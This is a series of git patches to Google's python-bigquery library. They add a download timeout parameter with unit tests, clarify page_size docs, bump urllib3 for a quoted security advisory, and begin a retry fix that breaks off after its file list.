From 4f67ba20b49159e81f645ed98e401b9bb1359c1a Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 8 Jan 2026 18:25:23 -0500 Subject: [PATCH 1/7] =?UTF-8?q?fix:=20add=20timeout=20parameter=20to=20to?= =?UTF-8?q?=5Fdataframe=20and=20to=5Farrow=20met=E2=80=A6=20(#2354)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit ### Description This PR adds a `timeout` parameter to the `to_dataframe()` and `to_arrow()` methods (and their corresponding `*_iterable`, `*_geodataframe` and `QueryJob` wrappers) in the BigQuery client library. This addresses an issue where these methods could hang indefinitely if the underlying BigQuery Storage API stream blocked (e.g., due to firewall issues or network interruptions) during the download phase. The added `timeout` parameter ensures that the download operation respects the specified time limit and raises a `concurrent.futures.TimeoutError` if it exceeds the duration. ### Changes - Modified `google/cloud/bigquery/_pandas_helpers.py`: - Updated `_download_table_bqstorage` to accept a `timeout` argument. - Implemented a timeout check within the result processing loop. - Updated wrapper functions `download_dataframe_bqstorage` and `download_arrow_bqstorage` to accept and pass the `timeout` parameter. - Modified `google/cloud/bigquery/table.py`: - Updated `RowIterator` methods (`to_arrow_iterable`, `to_arrow`, `to_dataframe_iterable`, `to_dataframe`, `to_geodataframe`) to accept and pass `timeout`. - Updated `_EmptyRowIterator` methods to match the `RowIterator` signature, preventing `TypeError` when a timeout is provided for empty result sets. - Modified `google/cloud/bigquery/job/query.py`: - Updated `QueryJob` methods (`to_arrow`, `to_dataframe`, `to_geodataframe`) to accept `timeout` and pass it to the result iterator. - Updated unit tests in `tests/unit/job/test_query_pandas.py`, `tests/unit/test_table.py`, and `tests/unit/test_table_pandas.py` to reflect the signature changes. Fixes internal bug: b/468091307 --- google/cloud/bigquery/_pandas_helpers.py | 126 ++++++++++++++--------- google/cloud/bigquery/job/query.py | 17 +++ google/cloud/bigquery/table.py | 44 +++++++- tests/unit/job/test_query_pandas.py | 33 ++++++ tests/unit/test__pandas_helpers.py | 75 ++++++++++++++ tests/unit/test_table.py | 15 +++ tests/unit/test_table_pandas.py | 2 + 7 files changed, 257 insertions(+), 55 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 2dab03a06..5460f7ca7 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -26,6 +26,7 @@ import logging import queue import threading +import time import warnings from typing import Any, Union, Optional, Callable, Generator, List @@ -869,6 +870,7 @@ def _download_table_bqstorage( max_queue_size: Any = _MAX_QUEUE_SIZE_DEFAULT, max_stream_count: Optional[int] = None, download_state: Optional[_DownloadState] = None, + timeout: Optional[float] = None, ) -> Generator[Any, None, None]: """Downloads a BigQuery table using the BigQuery Storage API. @@ -899,6 +901,9 @@ def _download_table_bqstorage( download_state (Optional[_DownloadState]): A threadsafe state object which can be used to observe the behavior of the worker threads created by this method. + timeout (Optional[float]): + The number of seconds to wait for the download to complete. + If None, wait indefinitely. Yields: pandas.DataFrame: Pandas DataFrames, one for each chunk of data @@ -906,6 +911,8 @@ def _download_table_bqstorage( Raises: ValueError: If attempting to read from a specific partition or snapshot. + concurrent.futures.TimeoutError: + If the download does not complete within the specified timeout. Note: This method requires the `google-cloud-bigquery-storage` library @@ -973,60 +980,73 @@ def _download_table_bqstorage( worker_queue: queue.Queue[int] = queue.Queue(maxsize=max_queue_size) - with concurrent.futures.ThreadPoolExecutor(max_workers=total_streams) as pool: - try: - # Manually submit jobs and wait for download to complete rather - # than using pool.map because pool.map continues running in the - # background even if there is an exception on the main thread. - # See: https://github.com/googleapis/google-cloud-python/pull/7698 - not_done = [ - pool.submit( - _download_table_bqstorage_stream, - download_state, - bqstorage_client, - session, - stream, - worker_queue, - page_to_item, - ) - for stream in session.streams - ] - - while not_done: - # Don't block on the worker threads. For performance reasons, - # we want to block on the queue's get method, instead. This - # prevents the queue from filling up, because the main thread - # has smaller gaps in time between calls to the queue's get - # method. For a detailed explanation, see: - # https://friendliness.dev/2019/06/18/python-nowait/ - done, not_done = _nowait(not_done) - for future in done: - # Call result() on any finished threads to raise any - # exceptions encountered. - future.result() + # Manually manage the pool to control shutdown behavior on timeout. + pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) + wait_on_shutdown = True + start_time = time.time() - try: - frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) - yield frame - except queue.Empty: # pragma: NO COVER - continue + try: + # Manually submit jobs and wait for download to complete rather + # than using pool.map because pool.map continues running in the + # background even if there is an exception on the main thread. + # See: https://github.com/googleapis/google-cloud-python/pull/7698 + not_done = [ + pool.submit( + _download_table_bqstorage_stream, + download_state, + bqstorage_client, + session, + stream, + worker_queue, + page_to_item, + ) + for stream in session.streams + ] + + while not_done: + # Check for timeout + if timeout is not None: + elapsed = time.time() - start_time + if elapsed > timeout: + wait_on_shutdown = False + raise concurrent.futures.TimeoutError( + f"Download timed out after {timeout} seconds." + ) + + # Don't block on the worker threads. For performance reasons, + # we want to block on the queue's get method, instead. This + # prevents the queue from filling up, because the main thread + # has smaller gaps in time between calls to the queue's get + # method. For a detailed explanation, see: + # https://friendliness.dev/2019/06/18/python-nowait/ + done, not_done = _nowait(not_done) + for future in done: + # Call result() on any finished threads to raise any + # exceptions encountered. + future.result() + + try: + frame = worker_queue.get(timeout=_PROGRESS_INTERVAL) + yield frame + except queue.Empty: # pragma: NO COVER + continue - # Return any remaining values after the workers finished. - while True: # pragma: NO COVER - try: - frame = worker_queue.get_nowait() - yield frame - except queue.Empty: # pragma: NO COVER - break - finally: - # No need for a lock because reading/replacing a variable is - # defined to be an atomic operation in the Python language - # definition (enforced by the global interpreter lock). - download_state.done = True + # Return any remaining values after the workers finished. + while True: # pragma: NO COVER + try: + frame = worker_queue.get_nowait() + yield frame + except queue.Empty: # pragma: NO COVER + break + finally: + # No need for a lock because reading/replacing a variable is + # defined to be an atomic operation in the Python language + # definition (enforced by the global interpreter lock). + download_state.done = True - # Shutdown all background threads, now that they should know to - # exit early. - pool.shutdown(wait=True) + # Shutdown all background threads, now that they should know to + # exit early. + pool.shutdown(wait=wait_on_shutdown) def download_arrow_bqstorage( @@ -1037,6 +1057,7 @@ def download_arrow_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): return _download_table_bqstorage( project_id, @@ -1047,6 +1068,7 @@ def download_arrow_bqstorage( page_to_item=_bqstorage_page_to_arrow, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) @@ -1060,6 +1082,7 @@ def download_dataframe_bqstorage( selected_fields=None, max_queue_size=_MAX_QUEUE_SIZE_DEFAULT, max_stream_count=None, + timeout=None, ): page_to_item = functools.partial(_bqstorage_page_to_dataframe, column_names, dtypes) return _download_table_bqstorage( @@ -1071,6 +1094,7 @@ def download_dataframe_bqstorage( page_to_item=page_to_item, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 38b8a7148..e82deb1ef 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -1857,6 +1857,7 @@ def to_arrow( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, max_results: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -1904,6 +1905,10 @@ def to_arrow( .. versionadded:: 2.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pyarrow.Table A :class:`pyarrow.Table` populated with row data and column @@ -1921,6 +1926,7 @@ def to_arrow( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -1949,6 +1955,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Return a pandas DataFrame from a QueryJob @@ -2141,6 +2148,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data @@ -2174,6 +2185,7 @@ def to_dataframe( range_date_dtype=range_date_dtype, range_datetime_dtype=range_datetime_dtype, range_timestamp_dtype=range_timestamp_dtype, + timeout=timeout, ) # If changing the signature of this method, make sure to apply the same @@ -2191,6 +2203,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Return a GeoPandas GeoDataFrame from a QueryJob @@ -2269,6 +2282,9 @@ def to_geodataframe( then the data type will be ``numpy.dtype("object")``. BigQuery String type can be found at: https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. Returns: geopandas.GeoDataFrame: @@ -2296,6 +2312,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) def __iter__(self): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 5efcb1958..195461006 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2087,6 +2087,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """[Beta] Create an iterable of class:`pyarrow.RecordBatch`, to process the table as a stream. @@ -2127,6 +2128,10 @@ def to_arrow_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pyarrow.RecordBatch: A generator of :class:`~pyarrow.RecordBatch`. @@ -2144,6 +2149,7 @@ def to_arrow_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema @@ -2161,6 +2167,7 @@ def to_arrow( progress_bar_type: Optional[str] = None, bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, create_bqstorage_client: bool = True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create a class:`pyarrow.Table` by loading all pages of a table or query. @@ -2202,6 +2209,9 @@ def to_arrow( This argument does nothing if ``bqstorage_client`` is supplied. .. versionadded:: 1.24.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. Returns: pyarrow.Table @@ -2236,7 +2246,7 @@ def to_arrow( record_batches = [] for record_batch in self.to_arrow_iterable( - bqstorage_client=bqstorage_client + bqstorage_client=bqstorage_client, timeout=timeout ): record_batches.append(record_batch) @@ -2271,6 +2281,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: int = _pandas_helpers._MAX_QUEUE_SIZE_DEFAULT, # type: ignore max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -2317,6 +2328,10 @@ def to_dataframe_iterable( setting this parameter value to a value > 0 can help reduce system resource consumption. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A generator of :class:`~pandas.DataFrame`. @@ -2344,6 +2359,7 @@ def to_dataframe_iterable( selected_fields=self._selected_fields, max_queue_size=max_queue_size, max_stream_count=max_stream_count, + timeout=timeout, ) tabledata_list_download = functools.partial( _pandas_helpers.download_dataframe_row_iterator, @@ -2381,6 +2397,7 @@ def to_dataframe( range_timestamp_dtype: Union[ Any, None ] = DefaultPandasDTypes.RANGE_TIMESTAMP_DTYPE, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create a pandas DataFrame by loading all pages of a query. @@ -2577,6 +2594,10 @@ def to_dataframe( .. versionadded:: 3.21.0 + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Returns: pandas.DataFrame: A :class:`~pandas.DataFrame` populated with row data and column @@ -2690,6 +2711,7 @@ def to_dataframe( progress_bar_type=progress_bar_type, bqstorage_client=bqstorage_client, create_bqstorage_client=create_bqstorage_client, + timeout=timeout, ) # Default date dtype is `db_dtypes.DateDtype()` that could cause out of bounds error, @@ -2768,6 +2790,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "geopandas.GeoDataFrame": """Create a GeoPandas GeoDataFrame by loading all pages of a query. @@ -2902,6 +2925,7 @@ def to_geodataframe( int_dtype=int_dtype, float_dtype=float_dtype, string_dtype=string_dtype, + timeout=timeout, ) return geopandas.GeoDataFrame( @@ -2917,9 +2941,6 @@ class _EmptyRowIterator(RowIterator): statements. """ - pages = () - total_rows = 0 - def __init__( self, client=None, api_request=None, path=None, schema=(), *args, **kwargs ): @@ -2931,12 +2952,14 @@ def __init__( *args, **kwargs, ) + self._total_rows = 0 def to_arrow( self, progress_bar_type=None, bqstorage_client=None, create_bqstorage_client=True, + timeout: Optional[float] = None, ) -> "pyarrow.Table": """[Beta] Create an empty class:`pyarrow.Table`. @@ -2944,6 +2967,7 @@ def to_arrow( progress_bar_type (str): Ignored. Added for compatibility with RowIterator. bqstorage_client (Any): Ignored. Added for compatibility with RowIterator. create_bqstorage_client (bool): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pyarrow.Table: An empty :class:`pyarrow.Table`. @@ -2970,6 +2994,7 @@ def to_dataframe( range_date_dtype=None, range_datetime_dtype=None, range_timestamp_dtype=None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -2990,6 +3015,7 @@ def to_dataframe( range_date_dtype (Any): Ignored. Added for compatibility with RowIterator. range_datetime_dtype (Any): Ignored. Added for compatibility with RowIterator. range_timestamp_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3008,6 +3034,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -3021,6 +3048,7 @@ def to_geodataframe( int_dtype (Any): Ignored. Added for compatibility with RowIterator. float_dtype (Any): Ignored. Added for compatibility with RowIterator. string_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3038,6 +3066,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pandas.DataFrame"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3056,6 +3085,9 @@ def to_dataframe_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pandas.DataFrame`. @@ -3071,6 +3103,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3086,6 +3119,9 @@ def to_arrow_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pyarrow.RecordBatch`. """ diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index a6c59b158..4390309f1 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -1023,5 +1023,38 @@ def test_query_job_to_geodataframe_delegation(wait_for_query): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) assert df is row_iterator.to_geodataframe.return_value + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_dataframe_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_dataframe(bqstorage_client=bqstorage_client, timeout=timeout) + + wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_dataframe.assert_called_once() + call_args = row_iterator.to_dataframe.call_args + assert call_args.kwargs["timeout"] == timeout + + +@pytest.mark.skipif(pyarrow is None, reason="Requires `pyarrow`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_arrow_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_arrow(bqstorage_client=bqstorage_client, timeout=timeout) + + wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_arrow.assert_called_once() + call_args = row_iterator.to_arrow.call_args + assert call_args.kwargs["timeout"] == timeout diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index bc94f5f54..a1cbb726b 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -13,12 +13,14 @@ # limitations under the License. import collections +import concurrent.futures import datetime import decimal import functools import gc import operator import queue +import time from typing import Union from unittest import mock import warnings @@ -2177,3 +2179,76 @@ def test_determine_requested_streams_invalid_max_stream_count(): """Tests that a ValueError is raised if max_stream_count is negative.""" with pytest.raises(ValueError): determine_requested_streams(preserve_order=False, max_stream_count=-1) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_error(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=[mock.Mock()]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def slow_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + # Block until the main thread sets done=True (which it will on timeout) + while not download_state.done: + time.sleep(0.01) + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=slow_download_stream + ): + # Use a very small timeout + result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=0.01 + ) + with pytest.raises(concurrent.futures.TimeoutError, match="timed out"): + list(result_gen) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_success(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=["stream/s0"]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def fast_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + worker_queue.put("result_page") + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=fast_download_stream + ): + # Use a generous timeout + result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=10.0 + ) + results = list(result_gen) + + assert results == ["result_page"] diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index af31d116b..97a1b4916 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2495,6 +2495,20 @@ def test_to_geodataframe(self): else: assert not hasattr(df, "crs") + def test_methods_w_timeout(self): + pytest.importorskip("pyarrow") + pytest.importorskip("geopandas") + # Ensure that the timeout parameter is accepted by all methods without raising a TypeError, + # even though the _EmptyRowIterator implementations do not use the timeout value. + timeout = 42.0 + + # Call each type to ensure no TypeError is raised + self._make_one().to_arrow(timeout=timeout) + self._make_one().to_arrow_iterable(timeout=timeout) + self._make_one().to_dataframe(timeout=timeout) + self._make_one().to_dataframe_iterable(timeout=timeout) + self._make_one().to_geodataframe(timeout=timeout) + class TestRowIterator(unittest.TestCase): PYARROW_MINIMUM_VERSION = str(_versions_helpers._MIN_PYARROW_VERSION) @@ -5665,6 +5679,7 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) self.assertIsInstance(df, geopandas.GeoDataFrame) diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index a4fa3fa39..64d8b1451 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -301,6 +301,7 @@ def test_rowiterator_to_geodataframe_with_default_dtypes( int_dtype=bigquery.enums.DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" @@ -358,6 +359,7 @@ def test_rowiterator_to_geodataframe_with_custom_dtypes( int_dtype=custom_int_dtype, float_dtype=custom_float_dtype, string_dtype=custom_string_dtype, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" From 73228432a3c821db05d898ea4a4788adf15b033d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 12 Jan 2026 12:09:58 -0600 Subject: [PATCH 2/7] =?UTF-8?q?docs:=20clarify=20that=20only=20jobs.query?= =?UTF-8?q?=20and=20jobs.getQueryResults=20are=20affec=E2=80=A6=20(#2349)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit …ted by page_size in query_and_wait Fixes internal issue b/433324499 Thank you for opening a Pull Request! Before submitting your PR, there are a few things you can do to make sure it goes smoothly: - [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose) before writing your code! That way we can discuss the change, evaluate designs, and agree on the general idea - [ ] Ensure the tests and linter pass - [ ] Code coverage does not decrease (if any source code was changed) - [ ] Appropriate docs were updated (if necessary) Fixes # 🦕 Co-authored-by: Lingqing Gan --- google/cloud/bigquery/client.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index e3a3cdb11..54c8886cd 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3655,6 +3655,11 @@ def query_and_wait( page_size (Optional[int]): The maximum number of rows in each page of results from the initial jobs.query request. Non-positive values are ignored. + + This parameter only affects the jobs.query and + jobs.getQueryResults API calls. Large results downloaded with + the BigQuery Storage Read API are intentionally unaffected + by this parameter. max_results (Optional[int]): The maximum total number of rows from this request. From 7b8ceea975a2e945eacb0a32c5946ff10e9fe20e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 21 Jan 2026 21:53:03 +0000 Subject: [PATCH 3/7] chore(deps): update dependency urllib3 to v2.6.3 [security] (#2357) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.6.0` → `==2.6.3` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.6.0/2.6.3?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2026-21441](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99) ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. However, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs. A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409). ### Affected usages Applications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. ### Remediation Upgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source. --- ### Release Notes
urllib3/urllib3 (urllib3) ### [`v2.6.3`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#263-2026-01-07) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.2...2.6.3) \================== - Fixed a high-severity security issue where decompression-bomb safeguards of the streaming API were bypassed when HTTP redirects were followed. (`GHSA-38jv-5279-wg99 `\_\_) - Started treating `Retry-After` times greater than 6 hours as 6 hours by default. (`#​3743 `\_\_) - Fixed `urllib3.connection.VerifiedHTTPSConnection` on Emscripten. (`#​3752 `\_\_) ### [`v2.6.2`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#262-2025-12-11) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.1...2.6.2) \================== - Fixed `HTTPResponse.read_chunked()` to properly handle leftover data in the decoder's buffer when reading compressed chunked responses. (`#​3734 `\_\_) ### [`v2.6.1`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#261-2025-12-08) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.0...2.6.1) \================== - Restore previously removed `HTTPResponse.getheaders()` and `HTTPResponse.getheader()` methods. (`#​3731 `\_\_)
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). Co-authored-by: Anthonios Partheniou --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ec5c7f2af..dd94deab6 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 -urllib3==2.6.0 +urllib3==2.6.3 From 24d45d0d5bf89762f253ba6bd6fdbee9d5993422 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 29 Jan 2026 13:23:16 -0500 Subject: [PATCH 4/7] fix: updates timeout/retry code to respect hanging server (#2408) **Description** This PR fixes a crash when handling `_InactiveRpcError` during retry logic and ensures proper `timeout` propagation in `RowIterator.to_dataframe`. **Fixes** **Retry Logic Crash**: Addressed an issue in `google/cloud/bigquery/retry.py` where `_should_retry` would raise a `TypeError` when inspecting unstructured `gRPC` errors (like `_InactiveRpcError`). The fix adds robust error inspection to fallback gracefully when `exc.errors` is not subscriptable. **Timeout Propagation**: Added the missing `timeout` parameter to `RowIterator.to_dataframe` in `google/cloud/bigquery/table.py`. This ensures that the user-specified `timeout` is correctly passed down to the underlying `to_arrow` call, preventing the client from hanging indefinitely when the Storage API is unresponsive. **Changes** Modified `google/cloud/bigquery/retry.py`: Updated `_should_retry` to handle `TypeError` and `KeyError` when accessing `exc.errors`. Modified `google/cloud/bigquery/table.py`: Updated `RowIterator.to_dataframe` signature and implementation to accept and pass the `timeout` parameter. The first half of this work was completed in PR #2354 --- google/cloud/bigquery/_pandas_helpers.py | 49 +++++++-- google/cloud/bigquery/dbapi/cursor.py | 2 + google/cloud/bigquery/retry.py | 16 ++- google/cloud/bigquery/table.py | 6 +- tests/unit/job/test_query_pandas.py | 6 ++ tests/unit/test__pandas_helpers.py | 131 +++++++++++++++++++++++ tests/unit/test_client_retry.py | 7 +- tests/unit/test_dbapi_cursor.py | 6 +- 